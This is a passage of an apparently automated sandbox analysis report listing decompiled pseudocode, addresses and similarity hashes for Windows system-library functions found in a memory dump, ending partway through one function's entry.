Instruction Fuzzy Hash: EC5181713043429FE325EF18D984B1BBBE5EBC4714F04492CF696D7291DA71EA0ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 017EF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E017EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E017D4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017F9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017F9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017F95D0();
							goto L11;
						} else {
							_t109 = L017D4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017FF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017F95D0();
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x017ef0d3
0x017ef0d9
0x017ef0e0
0x017ef0e7
0x017ef0f2
0x017ef0f4
0x017ef0f8
0x017ef100
0x017ef108
0x017ef10d
0x017ef115
0x017ef116
0x017ef11f
0x017ef123
0x017ef124
0x017ef12c
0x017ef130
0x017ef134
0x017ef13d
0x017ef144
0x017ef14b
0x017ef152
0x0182bab0
0x0182bab0
0x017ef158
0x017ef158
0x017ef15a
0x017ef160
0x017ef165
0x017ef166
0x017ef16f
0x017ef173
0x0182baa7
0x0182baa7
0x0182baab
0x00000000
0x017ef179
0x017ef18d
0x017ef191
0x0182baa2
0x00000000
0x017ef197
0x017ef19b
0x017ef1a2
0x017ef1a9
0x017ef1af
0x017ef1b2
0x017ef1b6
0x017ef1b9
0x017ef1c4
0x017ef1d8
0x017ef1df
0x017ef1e3
0x017ef1eb
0x017ef1ee
0x017ef1f4
0x017ef20f
0x0182bab7
0x0182babb
0x0182bacc
0x0182bad1
0x017ef215
0x017ef218
0x017ef226
0x017ef22b
0x00000000
0x017ef22b
0x017ef1f6
0x017ef1f6
0x017ef1f9
0x017ef1fb
0x017ef1fb
0x017ef1f4
0x017ef191
0x017ef173
0x017ef152
0x017ef203

Strings

@, xrefs: 017EF124

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 259efc7b8808c29f8848937935dc412c404131f6ab1d7d5d92f70c6207e959c4
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: C7518972105715ABC321DF28C840A6BFBF8FF48710F00892EFA9687690E7B4E954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01833540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01833540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x18ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01833706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01833540;
						E017FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0180DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01840C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017F97C0();
					}
					return E017FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01833971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01833884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E017F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01833787(_a4,  &_v352, _t80);
						}
					}
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01833552
0x0183355a
0x0183355d
0x01833566
0x01833567
0x0183357e
0x0183358f
0x018335a1
0x018335a5
0x0183366b
0x0183366b
0x0183366d
0x01833672
0x01833679
0x01833685
0x0183368d
0x0183369d
0x018336a7
0x018336b8
0x018336c6
0x018336c7
0x018336dc
0x018336e1
0x018336e7
0x018336e9
0x018336e9
0x01833703
0x01833703
0x018335b5
0x018335c0
0x018335c4
0x00000000
0x00000000
0x018335ca
0x018335d7
0x018335e2
0x018335e6
0x018335e8
0x018335f5
0x018335fa
0x01833603
0x01833604
0x01833609
0x0183360a
0x01833612
0x01833613
0x0183361e
0x01833622
0x01833628
0x0183362f
0x0183362f
0x01833636
0x01833638
0x0183363b
0x01833642
0x01833642
0x01833636
0x01833657
0x01833657
0x0183365c
0x01833662
0x01833669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0183358F

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
Instruction ID: 5ec2a63f66d67e5331d07cf89e93475d68cc797e8f97b1ee691e2cfea8893ca2
Opcode Fuzzy Hash: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
Instruction Fuzzy Hash: C14133B290052D9FDB219A54CC84FDEB77CAB44714F0445A9EB09AB241EB309F889FD5

Uniqueness

Uniqueness Score: -1.00%

Function 018805AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E018805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0187A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0187A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01881293(_t79, _v40, E018807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E017D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0187138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x018805c5
0x018805ca
0x018805d3
0x018806db
0x018806db
0x018806dd
0x018806e3
0x018806e3
0x018805dd
0x018805e7
0x018805f6
0x01880600
0x01880607
0x01880610
0x01880615
0x0188061a
0x0188061c
0x0188061e
0x01880624
0x01880625
0x01880627
0x01880628
0x01880631
0x01880640
0x0188064d
0x01880654
0x01880654
0x01880631
0x0188066d
0x01880674
0x00000000
0x00000000
0x01880692
0x0188069e
0x018806b0
0x018806a0
0x018806a9
0x018806a9
0x018806b8
0x018806d6
0x018806d6
0x00000000

Strings

`, xrefs: 01880633

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 3d684b9b541d7b4e2817123ee51c938e6b992ab7678e35906fa963443cc90084
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: D531E63260474A6BE720EE28CD85F9B7BD9EBC4758F184129FA54DB281D770EA08C791

Uniqueness

Uniqueness Score: -1.00%

Function 01833884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01833884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E017F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L017D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E017F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01833893
0x01833896
0x01833899
0x0183389f
0x018338a0
0x018338a4
0x018338a9
0x018338ac
0x018338ad
0x018338ae
0x018338af
0x018338b1
0x018338b4
0x018338bb
0x018338bc
0x018338bd
0x018338c4
0x018338c8
0x018338ca
0x018338ca
0x018338d5
0x0183393e
0x01833940
0x01833942
0x01833952
0x01833954
0x01833961
0x01833961
0x01833967
0x0183396e
0x0183396e
0x01833947
0x0183394c
0x00000000
0x0183394c
0x018338ea
0x018338ee
0x018338f8
0x018338f9
0x018338ff
0x01833900
0x01833902
0x01833903
0x0183390b
0x0183390f
0x01833950
0x00000000
0x01833950
0x01833915
0x0183391d
0x0183391d
0x01833922
0x01833926
0x00000000
0x01833928
0x0183392b
0x0183392b
0x01833935
0x01833937
0x01833937
0x00000000
0x01833935
0x01833926
0x018338f0
0x00000000

Strings

BinaryName, xrefs: 018338B4

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
Instruction ID: 0e82446ff37d13042102b66fb3944a3ca8cfe77fa96295d8c0cdc72a8919cdfb
Opcode Fuzzy Hash: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
Instruction Fuzzy Hash: 1331D13290151AEFEB16DA58C945E6BFB74FB81B20F1A4169AE15EB251D6309F00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 017ED294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E017ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x18ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E017D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E017FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017F95D0();
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x017ed29c
0x017ed2a6
0x017ed2b1
0x017ed2b5
0x017ed2b6
0x017ed2bc
0x017ed2bd
0x017ed2be
0x017ed2bf
0x017ed2c2
0x017ed2c4
0x017ed2cc
0x017ed384
0x017ed34b
0x017ed34f
0x017ed350
0x017ed351
0x017ed35c
0x017ed35c
0x017ed2d6
0x017ed2da
0x017ed2e1
0x017ed361
0x017ed369
0x017ed36d
0x017ed2e3
0x017ed2e3
0x017ed2e3
0x017ed2e5
0x017ed2ed
0x017ed2f5
0x017ed2fa
0x017ed302
0x017ed303
0x017ed30b
0x017ed30f
0x017ed313
0x017ed318
0x017ed31c
0x017ed320
0x017ed379
0x017ed37d
0x00000000
0x00000000
0x0182affe
0x0182b001
0x0182b011
0x00000000
0x017ed322
0x017ed322
0x017ed330
0x017ed337
0x017ed35d
0x017ed339
0x017ed33f
0x017ed38c
0x017ed38c
0x017ed33f
0x017ed349
0x00000000
0x017ed349

Strings

@, xrefs: 017ED303

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
Instruction ID: 6eb4e36aa71413f3b2890c51e3f2dea0b0a1feca5acc667fb80ee6265cd4585d
Opcode Fuzzy Hash: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
Instruction Fuzzy Hash: 02319FB5508305DFD321DF68C988A6BFBE8EB99654F40092EF995C7250E634DD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017C1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E017C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L017D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x017c1b8f
0x017c1b9a
0x017c1b9c
0x017c1b9e
0x017c1ba3
0x01817010
0x01817010
0x00000000
0x017c1ba9
0x017c1ba9
0x017c1bae
0x00000000
0x017c1bc5
0x017c1bca
0x017c1bcf
0x017c1bd0
0x017c1bd1
0x017c1bd2
0x017c1bd6
0x017c1bdc
0x017c1be0
0x01816ffc
0x01817000
0x00000000
0x01817006
0x01817009
0x01817009
0x017c1be6
0x017c1bec
0x017c1c0b
0x017c1c0b
0x017c1c0c
0x017c1c11
0x017c1c12
0x017c1c15
0x017c1c1b
0x017c1c1f
0x017c1c31
0x017c1c33
0x01817026
0x01817026
0x017c1c21
0x017c1c24
0x017c1c24
0x017c1bee
0x017c1bee
0x017c1bf2
0x017c1c3a
0x017c1bf4
0x017c1bf4
0x017c1c05
0x017c1c05
0x017c1c09
0x017c1c3e
0x00000000
0x00000000
0x00000000
0x017c1c09
0x017c1bec
0x017c1be0
0x017c1bae
0x017c1c2e

Strings

WindowsExcludedProcs, xrefs: 017C1BC5

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 504255c9d31a172762b4ecac8bfc47535654b1d0b11d2429c74a149350a5b26b
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: AA21C57B601229EBDB32DA59C844F9BFBADAF41B50F45447DFA04DB205D630DE0197A0

Uniqueness

Uniqueness Score: -1.00%

Function 017DF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E017DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x017df71d
0x017df722
0x017df726
0x01824770
0x017df765
0x017df769
0x017df769
0x017df732
0x0182477a
0x00000000
0x0182477a
0x017df738
0x017df73a
0x017df73c
0x017df73f
0x017df746
0x017df778
0x017df7a9
0x017df7a9
0x017df754
0x017df75a
0x017df75d
0x017df75f
0x017df761
0x017df76f
0x017df771
0x017df771
0x017df76f
0x017df763
0x00000000
0x017df763
0x017df77d
0x017df7a3
0x017df7a5
0x00000000
0x017df7a5
0x017df77f
0x017df782
0x017df784
0x017df786
0x00000000
0x00000000
0x00000000
0x017df788
0x017df748
0x017df74d
0x017df78d
0x017df793
0x017df7b7
0x017df7bc
0x00000000
0x017df7bc
0x017df798
0x00000000
0x00000000
0x017df79d
0x017df7b0
0x00000000
0x017df7b0
0x017df79f
0x00000000
0x017df74f
0x017df74f
0x00000000
0x017df74f

Strings

Actx , xrefs: 017DF73F

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
Instruction ID: c5ea72c6aa861c1c4f19f3028517c2f99abd05aa28cbb457f0d5a9954675ab7e
Opcode Fuzzy Hash: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
Instruction Fuzzy Hash: 4311E23430560A8BEB254E1CC9907F6F6B5AB95234FA7457AE467CB391DB70C8438340

Uniqueness

Uniqueness Score: -1.00%

Function 01868DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01868DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1890d50);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01845720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0180DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0180DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0180D130(_t34, _t39, _t40);
			}

0x01868df1
0x01868df1
0x01868df1
0x01868df1
0x01868df1
0x01868df1
0x01868df3
0x01868df8
0x01868dfd
0x01868e00
0x01868e0e
0x01868e2a
0x01868e36
0x01868e38
0x01868e3c
0x01868e46
0x01868e46
0x01868e36
0x01868e50
0x01868e56
0x01868e59
0x01868e5c
0x01868e60
0x01868e67
0x01868e6d
0x01868e73
0x01868e74
0x01868eb1
0x01868ebd

Strings

Critical error detected %lx, xrefs: 01868E21

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
Instruction ID: 19702784297af732aedd603f05a89a57fcdef0c4faa78e5fae277321d42b5ffb
Opcode Fuzzy Hash: ee25b9eeb8545ab39fcebd5f0d3c201982b83f65349beacd16598cbfceb9ad01
Instruction Fuzzy Hash: 3E1135B5D15348DBDF25CFE8890679CBBB4AB15314F24426EE569AB282C7344B02CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0184FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0184FF60

Memory Dump Source

